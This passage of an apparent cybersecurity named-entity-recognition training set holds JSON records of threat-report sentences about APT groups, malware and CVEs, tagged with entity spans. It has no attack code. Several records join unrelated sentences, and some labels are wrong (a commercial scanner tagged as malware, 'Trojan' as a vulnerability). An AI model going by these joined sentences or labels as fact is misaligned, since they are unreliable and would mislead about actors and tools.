Trend Micro generally notifies customers that are believed to have been specifically targeted by APT campaigns . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"TOOL: Winnti installer": [[310, 326]], "ORGANIZATION: Trend Micro": [[362, 373]], "ORGANIZATION: @SecurityAura": [[511, 524]]}, "info": {"id": "cyberner_stix_train_002846", "source": "cyberner_stix_train"}} {"text": "Instead , we believe that they are simply expanding their activities by adding new tools and techniques .", "spans": {}, "info": {"id": "cyberner_stix_train_002847", "source": "cyberner_stix_train"}} {"text": "APT33 often conducts spear-phishing operations using a built-in phishing module . 
We were not able to unpack the sample discovered after June 9 , 2017 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "cyberner_stix_train_002848", "source": "cyberner_stix_train"}} {"text": "If the returned JSON object has the “ 4 ” key , it will turn on the kill switch and initiate its own removal by sending an intent and seamlessly confirming the uninstall using the accessibility service , all without the victim ever noticing anything . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"THREAT_ACTOR: APT33": [[364, 369]], "ORGANIZATION: military": [[533, 541]], "ORGANIZATION: Symantec": [[612, 620]], "ORGANIZATION: customers": [[723, 732]]}, "info": {"id": "cyberner_stix_train_002849", "source": "cyberner_stix_train"}} {"text": "Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . 
Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well .", "spans": {"THREAT_ACTOR: APT41": [[62, 67]], "FILEPATH: nbtscan": [[291, 298]], "FILEPATH: powercat": [[303, 311]]}, "info": {"id": "cyberner_stix_train_002850", "source": "cyberner_stix_train"}} {"text": "Although the command and control domain was different from those in the report , the POST and GET requests were similar and included / dad5 / in the URL string .", "spans": {}, "info": {"id": "cyberner_stix_train_002851", "source": "cyberner_stix_train"}} {"text": "The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "ORGANIZATION: aerospace": [[97, 106]], "ORGANIZATION: energy": [[109, 115]], "ORGANIZATION: government": [[118, 128]], "ORGANIZATION: high-tech": [[131, 140]], "ORGANIZATION: consulting services": [[143, 162]], "ORGANIZATION: chemicals": [[165, 174]], "ORGANIZATION: manufacturing": [[177, 190]], "ORGANIZATION: mining sectors": [[193, 207]], "ORGANIZATION: civil society": [[351, 364]]}, "info": {"id": "cyberner_stix_train_002852", "source": "cyberner_stix_train"}} {"text": "If not , the application downloads a pack of exploits from the server and runs them one-by-one up until root is achieved . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . 
Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC .", "spans": {"MALWARE: slides": [[156, 162]], "VULNERABILITY: CVE-2017-8759": [[187, 200]], "TOOL: Microsoft .NET framework": [[244, 268]], "THREAT_ACTOR: Molerats group": [[298, 312]], "ORGANIZATION: Norman": [[346, 352]], "ORGANIZATION: Kaspersky": [[355, 364]], "ORGANIZATION: FireEye": [[367, 374]], "ORGANIZATION: PwC": [[381, 384]]}, "info": {"id": "cyberner_stix_train_002853", "source": "cyberner_stix_train"}} {"text": "Overall , it has a fairly common feature list , but it is expected to expand in future updates . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . Therefore , Tick or their digital quartermaster is capable of deploying new and unique exploits .", "spans": {"THREAT_ACTOR: APT10": [[122, 127]], "ORGANIZATION: law firm": [[282, 290]], "ORGANIZATION: apparel company": [[299, 314]], "THREAT_ACTOR: Tick": [[329, 333]]}, "info": {"id": "cyberner_stix_train_002854", "source": "cyberner_stix_train"}} {"text": "Check if the computer name and user name , or external IP address , is in a provided list and if so , display a message box with a message as defined by the C2 .", "spans": {"TOOL: C2": [[157, 159]]}, "info": {"id": "cyberner_stix_train_002855", "source": "cyberner_stix_train"}} {"text": "The export called “ SendDataToServer_2 ” does exactly what the name means : it encrypts all collected data , encodes it using Base64 encoding and calls its additional library to send the data to the C2 server .", "spans": {"TOOL: C2": [[199, 201]]}, "info": {"id": "cyberner_stix_train_002856", "source": "cyberner_stix_train"}} {"text": "After iterating over the 171 samples , we ’re left with this list of hashes for the downloaded files .", "spans": {}, "info": {"id": 
"cyberner_stix_train_002857", "source": "cyberner_stix_train"}} {"text": "Most recently , Animal Farm deployed the Casper Trojan via a watering-hole attack in Syria . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"THREAT_ACTOR: Animal Farm": [[16, 27]], "TOOL: Casper Trojan": [[41, 54]], "MALWARE: Carbanak": [[113, 121]], "THREAT_ACTOR: criminals": [[188, 197]], "ORGANIZATION: financial industry": [[238, 256]], "ORGANIZATION: customers": [[280, 289]]}, "info": {"id": "cyberner_stix_train_002858", "source": "cyberner_stix_train"}} {"text": "It is plausible that Artifact #1 could be present on other servers under different names , although it is also likely that the attacker only left it on servers to which they required maintainenance of persistent access .", "spans": {}, "info": {"id": "cyberner_stix_train_002859", "source": "cyberner_stix_train"}} {"text": "FinFisher loader calling native Windows API to perform anti-debugging tricks At this point , the fun in analysis is not over . M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats . Thus far , BlackBerry Cylance has observed two backdoors being used in combination with the steganography loader – a version of Denes backdoor ( bearing similarities to the one described by ESET ) , and an updated version of Remy backdoor . PREDATOR is intended to work with another spyware component called “ ALIEN ” ( it ’s not “ Alien vs. 
Predator ” this time ; they ’re working together ) .", "spans": {"MALWARE: FinFisher": [[0, 9]], "SYSTEM: Windows": [[32, 39]], "ORGANIZATION: M-Trends": [[127, 135]], "ORGANIZATION: BlackBerry Cylance": [[309, 327]], "MALWARE: Denes backdoor": [[426, 440]], "ORGANIZATION: ESET": [[488, 492]], "MALWARE: Remy backdoor": [[523, 536]], "MALWARE: PREDATOR": [[539, 547]], "MALWARE: ALIEN": [[608, 613]], "MALWARE: Alien": [[630, 635]], "MALWARE: Predator": [[640, 648]]}, "info": {"id": "cyberner_stix_train_002860", "source": "cyberner_stix_train"}} {"text": "“ Agent Smith ” needs to be updated/installed without the user ’ s consent . Just like last time , Buhtrap is spreading through exploits embedded in news outlets . exe file in the package is usually named various things , such as z.exe or ex.exe , to avoid scrutiny . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "ORGANIZATION: news outlets": [[149, 161]], "FILEPATH: exe": [[164, 167]], "FILEPATH: z.exe": [[230, 235]], "FILEPATH: ex.exe": [[239, 245]], "ORGANIZATION: RussianPanda": [[268, 280]]}, "info": {"id": "cyberner_stix_train_002861", "source": "cyberner_stix_train"}} {"text": "But the apps , with their many millions of users , have captured the attention of the bad actors , too , who are exploiting the popularity of Netflix to spread malware . Like the majority of APT groups , Silence uses phishing as their infection vector . 
From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": {"ORGANIZATION: Netflix": [[142, 149]], "THREAT_ACTOR: Silence": [[204, 211]], "MALWARE: Carbanak": [[264, 272]], "ORGANIZATION: banks": [[309, 314]], "ORGANIZATION: electronic payment": [[319, 337]], "ORGANIZATION: space": [[379, 384]]}, "info": {"id": "cyberner_stix_train_002862", "source": "cyberner_stix_train"}} {"text": "* Actually , we are currently investigating whether this group might also be behind a large-scale web-oriented attack at the end of 2018 using code injection and exploiting SQL vulnerabilities . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . The intercepted attack starts with a spear phishing email embedding a spreadsheet .", "spans": {"VULNERABILITY: SQL vulnerabilities": [[173, 192]], "THREAT_ACTOR: APT group": [[304, 313]]}, "info": {"id": "cyberner_stix_train_002863", "source": "cyberner_stix_train"}} {"text": "ViperRAT has been operational for quite some time , with what appears to be a test application that surfaced in late 2015 . In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company . The watchdog thread checks the registry path of the ZxShell service every 2 seconds , to verify that it has n’t been modified . 
What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": {"MALWARE: ViperRAT": [[0, 8]], "ORGANIZATION: HBGary": [[132, 138], [223, 229]], "ORGANIZATION: American video game company": [[248, 275]], "TOOL: watchdog": [[282, 290]], "MALWARE: ZxShell": [[330, 337]], "THREAT_ACTOR: the former MiniDuke attackers": [[439, 468]]}, "info": {"id": "cyberner_stix_train_002864", "source": "cyberner_stix_train"}} {"text": "We discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware .", "spans": {"THREAT_ACTOR: Suckfly": [[14, 21]]}, "info": {"id": "cyberner_stix_train_002865", "source": "cyberner_stix_train"}} {"text": "Notification handling method The class is only implemented in debug mode , pushing all captured information into the log . To do this , it employs a number of specific commands via DNSMessenger . Attached to this email was another malicious document that was designed to exploit CVE-2012-0158 . Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": {"TOOL: DNSMessenger": [[181, 193]], "TOOL: email": [[213, 218]], "VULNERABILITY: CVE-2012-0158": [[279, 292]], "THREAT_ACTOR: Scheduled Task APT29": [[318, 338]]}, "info": {"id": "cyberner_stix_train_002866", "source": "cyberner_stix_train"}} {"text": "We started with most frequently used C & C domains “ a * * * d.com ” , “ a * * * d.net ” , and “ a * * * d.org ” . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . If any of the processes are terminated , the monitors immediately identify the situation , terminate all remaining malicious processes , and re-infect the device . 
In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": {"MALWARE: Acunetix Web Vulnerability Scanner": [[149, 183]], "TOOL: w3wp.exe": [[511, 519]]}, "info": {"id": "cyberner_stix_train_002867", "source": "cyberner_stix_train"}} {"text": "The description is based on analysis of the sample described in Table 3 below , which was of interest given its C2 domain mefound [ . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . The targets of TG-4127 include military , government and defense sectors .", "spans": {"THREAT_ACTOR: APT41": [[157, 162]], "ORGANIZATION: European conglomerate": [[174, 195]], "THREAT_ACTOR: TG-4127": [[277, 284]], "ORGANIZATION: military": [[293, 301]], "ORGANIZATION: government": [[304, 314]], "ORGANIZATION: defense sectors": [[319, 334]]}, "info": {"id": "cyberner_stix_train_002868", "source": "cyberner_stix_train"}} {"text": "Figure 4 : Alert prompting the victim to download an Android banking app ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Dear Customer , The system has detected that the Bank Austria Security App is not installed on your smartphone . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . 
The group has focused on targets associated with governments and related organizations in South and Southeast Asia .", "spans": {"SYSTEM: Android banking app": [[53, 72]], "SYSTEM: Bank Austria Security App": [[219, 244]], "THREAT_ACTOR: actors": [[314, 320]], "ORGANIZATION: governments": [[436, 447]], "ORGANIZATION: organizations": [[460, 473]]}, "info": {"id": "cyberner_stix_train_002869", "source": "cyberner_stix_train"}} {"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "ORGANIZATION: personnel": [[56, 65]], "ORGANIZATION: military": [[77, 85]], "ORGANIZATION: political": [[90, 99]], "MALWARE: Gh0st RAT": [[227, 236]], "ORGANIZATION: People's Republic": [[340, 357]]}, "info": {"id": "cyberner_stix_train_002870", "source": "cyberner_stix_train"}} {"text": "EventBot screen lock with support for Samsung devices A new method to handle screen lock with support for Samsung devices . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . 
CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns .", "spans": {"MALWARE: EventBot": [[0, 8]], "ORGANIZATION: Samsung": [[38, 45], [106, 113]], "MALWARE: malware": [[128, 135]], "TOOL: CMD/PowerShell": [[164, 178]], "THREAT_ACTOR: attackers": [[196, 205]], "ORGANIZATION: CTU": [[294, 297]], "THREAT_ACTOR: COBALT GYPSY": [[330, 342]]}, "info": {"id": "cyberner_stix_train_002871", "source": "cyberner_stix_train"}} {"text": "To support the rapid growth and pace of malware distribution efforts , SilverTerrier actors are in constant need of domains to serve as C2 nodes . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"THREAT_ACTOR: SilverTerrier actors": [[71, 91]], "MALWARE: WhiteBear": [[166, 175]], "ORGANIZATION: embassies": [[200, 209]]}, "info": {"id": "cyberner_stix_train_002872", "source": "cyberner_stix_train"}} {"text": "The information is written into a file on the device . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism . It can range from asking “ customers ” to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": {"THREAT_ACTOR: ScarCruft": [[55, 64]], "MALWARE: GRIFFON": [[219, 226]], "TOOL: JScript": [[252, 259]], "THREAT_ACTOR: cyber attacks": [[422, 435]]}, "info": {"id": "cyberner_stix_train_002873", "source": "cyberner_stix_train"}} {"text": "A separate app from Check Point competitor Lookout also detects the threat as a variant of the Shedun malware family . 
The Lazarus Group employs a variety of RATs that operate in both client mode and server mode . NanoCore ( Trojan.Nancrat ) : Commodity RAT used to open a backdoor on an infected computer and steal information . Modules may be downloaded from a remote server or loaded from disk .", "spans": {"ORGANIZATION: Check Point": [[20, 31]], "ORGANIZATION: Lookout": [[43, 50]], "MALWARE: Shedun": [[95, 101]], "THREAT_ACTOR: Lazarus Group": [[123, 136]], "TOOL: RATs": [[158, 162]], "MALWARE: NanoCore": [[214, 222]], "MALWARE: Trojan.Nancrat": [[225, 239]]}, "info": {"id": "cyberner_stix_train_002874", "source": "cyberner_stix_train"}} {"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process . The BlackTech group is primarily focused on cyberespionage in Asia .", "spans": {"TOOL: operating system-supported feature": [[19, 53]]}, "info": {"id": "cyberner_stix_train_002875", "source": "cyberner_stix_train"}} {"text": "To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": {"THREAT_ACTOR: TG-3390": [[148, 155]], "ORGANIZATION: CTU": [[204, 207]], "VULNERABILITY: zero-day": [[262, 270]]}, "info": {"id": "cyberner_stix_train_002876", "source": "cyberner_stix_train"}} {"text": "The observed timezones correspond to the pre-2011 definition of Moscow Standard Time ( MSK ) , which was UTC+3 during the winter and UTC+4 during the summer .", "spans": {}, "info": {"id": "cyberner_stix_train_002877", "source": "cyberner_stix_train"}} {"text": "Based on our culprit ’ s email address , we were able to find his GitHub repository . The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality . 
Filename: How can North Korean hydrogen bomb wipe out Manhattan.scr .", "spans": {"ORGANIZATION: GitHub": [[66, 72]], "MALWARE: malware": [[90, 97]], "MALWARE: DLLs": [[114, 118]], "FILEPATH: How can North Korean hydrogen bomb wipe out Manhattan.scr": [[205, 262]]}, "info": {"id": "cyberner_stix_train_002878", "source": "cyberner_stix_train"}} {"text": "Similarly , there are many crucial commands that further allow this spyware to perform additional functionality , such as executing commands sent by the C & C , clicking photos , capturing screenshots , stealing location information , and more . FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {"TOOL: FuzzBunch": [[246, 255]], "THREAT_ACTOR: Shadow Brokers": [[356, 370]], "THREAT_ACTOR: NEODYMIUM": [[381, 390]]}, "info": {"id": "cyberner_stix_train_002879", "source": "cyberner_stix_train"}} {"text": "arrive ; at least that was how it used to be before the age of cyber wars . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . 
In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user .", "spans": {"VULNERABILITY: zero-day exploit": [[201, 217]], "VULNERABILITY: CVE-2014-4148": [[220, 233]], "THREAT_ACTOR: actor": [[329, 334]]}, "info": {"id": "cyberner_stix_train_002880", "source": "cyberner_stix_train"}} {"text": "TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "cyberner_stix_train_002881", "source": "cyberner_stix_train"}} {"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": {"MALWARE: China Chopper": [[4, 17]], "VULNERABILITY: CVE-2015-0062": [[146, 159]], "VULNERABILITY: CVE-2015-1701": [[162, 175]], "VULNERABILITY: CVE-2016-0099": [[180, 193]], "THREAT_ACTOR: attacker": [[207, 215]], "THREAT_ACTOR: Tropic Trooper": [[256, 270]], "VULNERABILITY: CVE-2012-0158": [[296, 309]]}, "info": {"id": "cyberner_stix_train_002882", "source": "cyberner_stix_train"}} {"text": "HTML/JS launcher page serves Flash exploit .", "spans": {"TOOL: HTML/JS": [[0, 7]], "TOOL: Flash": [[29, 34]]}, "info": {"id": "cyberner_stix_train_002883", "source": "cyberner_stix_train"}} {"text": "While we do not have complete targeting , information associated with these Poison Ivy samples , several of the decoy files were in Chinese and appear to be part of a 2016 campaign targeting organizations in Taiwan with political-themed lures . 
In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production .", "spans": {"MALWARE: Poison Ivy": [[76, 86]], "MALWARE: BalkanDoor": [[278, 288]], "VULNERABILITY: CVE-2018-20250": [[473, 487]], "THREAT_ACTOR: APT33": [[490, 495]], "ORGANIZATION: aviation sector": [[550, 565]], "ORGANIZATION: energy sector": [[600, 613]], "ORGANIZATION: petrochemical": [[627, 640]]}, "info": {"id": "cyberner_stix_train_002884", "source": "cyberner_stix_train"}} {"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems located in Thailand .", "spans": {"ORGANIZATION: social media": [[64, 76]], "ORGANIZATION: Unit 42": [[159, 166]], "MALWARE: Bookworm": [[211, 219]], "TOOL: C2": [[220, 222]]}, "info": {"id": "cyberner_stix_train_002885", "source": "cyberner_stix_train"}} {"text": "Upon opening the file , the user is asked to enable “ Google Play Protect ” as shown in Figure 2 . Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors . The second one is CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . 
In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"SYSTEM: Google Play": [[54, 65]], "THREAT_ACTOR: Butterfly": [[99, 108]], "ORGANIZATION: multi-billion dollar companies": [[122, 152]], "ORGANIZATION: pharmaceutical": [[195, 209]], "ORGANIZATION: commodities sectors": [[216, 235]], "THREAT_ACTOR: CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey": [[256, 302]], "VULNERABILITY: the complexity of managing CSP rules": [[473, 509]], "VULNERABILITY: vulnerability": [[517, 530]], "SYSTEM: Google Analytics": [[570, 586]]}, "info": {"id": "cyberner_stix_train_002886", "source": "cyberner_stix_train"}} {"text": "These stores are an attractive alternative to Google Play because many of their apps are free , or offer free versions of paid apps . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea . so dword_745BB58C * ( dword_745BB58C – 1 ) The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": {"SYSTEM: Google Play": [[46, 57]], "THREAT_ACTOR: APT38": [[243, 248]], "THREAT_ACTOR: cyber operators": [[259, 274]], "THREAT_ACTOR: TEMP.Hermit": [[285, 296]], "ORGANIZATION: Lab 110": [[317, 324]], "TOOL: Python script": [[492, 505]], "ORGANIZATION: CrowdStrike researchers": [[533, 556]], "THREAT_ACTOR: Play ransomware attacks": [[599, 622]]}, "info": {"id": "cyberner_stix_train_002887", "source": "cyberner_stix_train"}} {"text": "Delimiters Another technique to obfuscate unencrypted strings uses repeated delimiters . 
The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems . ZXSockProxy Run a Sock 4 & 5 Proxy server . Learn How ThreatConnect Can Help Protect Email From Phishing and BEC Attacks", "spans": {"ORGANIZATION: FBI": [[93, 96]], "THREAT_ACTOR: group of malicious cyber actors": [[108, 139]], "THREAT_ACTOR: APT6": [[153, 157]], "THREAT_ACTOR: 1.php": [[161, 166]], "TOOL: customized malicious software": [[267, 296]], "TOOL: ThreatConnect": [[386, 399]]}, "info": {"id": "cyberner_stix_train_002888", "source": "cyberner_stix_train"}} {"text": "The “ SendData ” export sends a HTTP POST request using a hardcoded URI “ /store/ “ .", "spans": {}, "info": {"id": "cyberner_stix_train_002889", "source": "cyberner_stix_train"}} {"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {"TOOL: Word": [[32, 36]], "THREAT_ACTOR: PLATINUM": [[39, 47]], "VULNERABILITY: CVE-2015-2545": [[153, 166]], "THREAT_ACTOR: attacker": [[200, 208]], "TOOL: emails": [[341, 347]], "TOOL: email": [[428, 433]]}, "info": {"id": "cyberner_stix_train_002890", "source": "cyberner_stix_train"}} {"text": "Once the payload is prepared , “ Agent Smith ” uses it to build another APK file , exploiting the Janus vulnerability : Figure 8 : The new infected APK file structure Solely injecting the code of the loader is not enough . 
With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software . Dexphot halts the infection process immediately if an antivirus product is found running . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"MALWARE: Agent Smith": [[33, 44]], "VULNERABILITY: Janus": [[98, 103]], "TOOL: Lurk banking trojan": [[267, 286]], "ORGANIZATION: banks": [[369, 374]], "MALWARE: Dexphot": [[390, 397]], "ORGANIZATION: Mastodon": [[529, 537]], "ORGANIZATION: Randy McEoin": [[546, 558]]}, "info": {"id": "cyberner_stix_train_002891", "source": "cyberner_stix_train"}} {"text": "We also found similarities in two older samples disguised as a Google service and , subsequently , as a music app after further investigation . The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system . . Limited forensic evidence existed to determine exactly how TIEDYE was deployed to systems in the victim environment ; however , like STRATOFEAR , TIEDYE was likely deployed as a second - stage backdoor by FULLHOUSE.DOORED .", "spans": {"ORGANIZATION: Google": [[63, 69]], "TOOL: wget": [[171, 175]], "MALWARE: TIEDYE": [[359, 365], [446, 452]], "MALWARE: STRATOFEAR": [[433, 443]]}, "info": {"id": "cyberner_stix_train_002892", "source": "cyberner_stix_train"}} {"text": "For example , the default configuration file with injects is non-operational , and the malware contains no fake built-in windows requesting bank card details . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . 
This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution .", "spans": {"ORGANIZATION: Symantec": [[160, 168]], "THREAT_ACTOR: Waterbug": [[214, 222]], "TOOL: Remote Administration Tool": [[384, 410]]}, "info": {"id": "cyberner_stix_train_002893", "source": "cyberner_stix_train"}} {"text": "It seems Eset has discovered and published on a new malware module created by Turla . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only .", "spans": {"ORGANIZATION: Eset": [[9, 13]], "THREAT_ACTOR: Turla": [[78, 83]], "FILEPATH: JS dropper": [[129, 139]], "FILEPATH: JS decryptor": [[162, 174]], "FILEPATH: KopiLuwak": [[254, 263]]}, "info": {"id": "cyberner_stix_train_002894", "source": "cyberner_stix_train"}} {"text": "According to Kaspersky , the Equation Group has more than 60 members and has been operating since at least 2001 . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22]], "TOOL: emails": [[143, 149]], "ORGANIZATION: bank employees": [[168, 182]]}, "info": {"id": "cyberner_stix_train_002895", "source": "cyberner_stix_train"}} {"text": "We have not been able to ascertain how the DroidVPN app on the uyghurapps [ . The PowerShell version of the Trojan also has the ability to get screenshots . 
From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": {"MALWARE: PowerShell": [[82, 92]], "ORGANIZATION: FireEye": [[189, 196]], "THREAT_ACTOR: APT12": [[206, 211]], "MALWARE: RIPTIDE": [[222, 229]], "MALWARE: HTTP": [[254, 258]], "TOOL: C2": [[297, 299]]}, "info": {"id": "cyberner_stix_train_002896", "source": "cyberner_stix_train"}} {"text": "The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack .", "spans": {"VULNERABILITY: Trojan": [[41, 47]]}, "info": {"id": "cyberner_stix_train_002897", "source": "cyberner_stix_train"}} {"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions .", "spans": {"VULNERABILITY: CVE-2013-0640": [[64, 77]], "TOOL: MiniDuke": [[88, 96]], "VULNERABILITY: zero-day": [[150, 158]], "THREAT_ACTOR: group": [[180, 185]], "THREAT_ACTOR: Turla APT group": [[209, 224]]}, "info": {"id": "cyberner_stix_train_002898", "source": "cyberner_stix_train"}} {"text": "FrozenCell is the mobile component of a multi-platform attack we 've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 , '' use to spy on victims through compromised mobile devices and desktops . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany . From direct observation , we can confirm that APT1 was using WEBC2 backdoors as early as July 2006 . 
\" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": {"MALWARE: FrozenCell": [[0, 10]], "MALWARE: Two-tailed Scorpion/APT-C-23": [[100, 128]], "ORGANIZATION: banks": [[227, 232], [295, 300]], "TOOL: banking Trojan": [[249, 263]], "TOOL: GozNym": [[264, 270]], "THREAT_ACTOR: APT1": [[360, 364]], "MALWARE: WEBC2 backdoors": [[375, 390]], "MALWARE: Winnti malware": [[530, 544]]}, "info": {"id": "cyberner_stix_train_002899", "source": "cyberner_stix_train"}} {"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits – 4 digits) and the number of cycles (billCount – 2 digits) to repeat the dispensing operation (see Figure 10) .", "spans": {"MALWARE: INI file": [[4, 12]], "TOOL: PowerShell": [[100, 110]], "MALWARE: VBS file": [[151, 159]], "MALWARE: WScript.exe": [[179, 190]], "FILEPATH: Ploutus-D": [[193, 202]], "THREAT_ACTOR: attackers": [[219, 228]]}, "info": {"id": "cyberner_stix_train_002900", "source": "cyberner_stix_train"}} {"text": "The malware , packaged within an Android game app called BrainTest , had been published to Google Play twice . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
